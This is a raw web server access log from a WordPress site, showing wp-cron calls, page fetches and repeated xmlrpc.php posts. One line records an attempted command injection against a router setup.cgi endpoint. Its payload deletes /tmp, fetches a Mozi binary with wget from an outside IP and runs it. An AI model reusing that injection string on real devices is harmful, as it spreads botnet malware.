87.120.191.70 - - [16/Sep/2025:11:02:59 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:11:05:26 +0800] "POST /wp-cron.php?doing_wp_cron=1757991926.9006869792938232421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:11:05:27 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:11:06:35 +0800] "POST /wp-cron.php?doing_wp_cron=1757991995.4597439765930175781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
117.215.54.99 - - [16/Sep/2025:11:06:35 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://117.215.54.99:37206/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 31368 "-" "-"
36.133.115.36 - - [16/Sep/2025:11:25:44 +0800] "POST /wp-cron.php?doing_wp_cron=1757993144.6712269783020019531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:11:25:44 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:11:27:05 +0800] "POST /wp-cron.php?doing_wp_cron=1757993225.4855899810791015625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.96.17.195 - - [16/Sep/2025:11:27:05 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:11:28:36 +0800] "POST /wp-cron.php?doing_wp_cron=1757993316.6985731124877929687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.142.193.144 - - [16/Sep/2025:11:28:37 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:11:34:29 +0800] "POST /wp-cron.php?doing_wp_cron=1757993669.4962038993835449218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.89.237.80 - - [16/Sep/2025:11:34:29 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:11:38:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757993892.3497779369354248046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
172.236.228.208 - - [16/Sep/2025:11:38:12 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
172.236.228.208 - - [16/Sep/2025:11:38:14 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:11:40:22 +0800] "POST /wp-cron.php?doing_wp_cron=1757994022.8468658924102783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [16/Sep/2025:11:40:23 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:11:41:45 +0800] "POST /wp-cron.php?doing_wp_cron=1757994105.8155040740966796875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
107.172.243.11 - - [16/Sep/2025:11:41:45 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:11:45:03 +0800] "POST /wp-cron.php?doing_wp_cron=1757994303.0649631023406982421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.148.106.248 - - [16/Sep/2025:11:45:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.7"
36.148.106.248 - - [16/Sep/2025:11:45:03 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.7"
183.198.170.24 - - [16/Sep/2025:11:45:08 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.69"
36.133.115.36 - - [16/Sep/2025:11:49:02 +0800] "POST /wp-cron.php?doing_wp_cron=1757994541.9728980064392089843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
68.183.157.208 - - [16/Sep/2025:11:49:02 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0"
36.133.115.36 - - [16/Sep/2025:11:50:41 +0800] "POST /wp-cron.php?doing_wp_cron=1757994641.2769949436187744140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.27.244 - - [16/Sep/2025:11:50:41 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [16/Sep/2025:11:51:10 +0800] "POST /wp-cron.php?doing_wp_cron=1757994670.4887080192565917968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [16/Sep/2025:11:51:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [16/Sep/2025:11:52:01 +0800] "POST /wp-cron.php?doing_wp_cron=1757994721.0339839458465576171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [16/Sep/2025:11:52:01 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.48.179.155 - - [16/Sep/2025:11:52:38 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36"
36.133.115.36 - - [16/Sep/2025:11:55:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757994949.4587020874023437500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
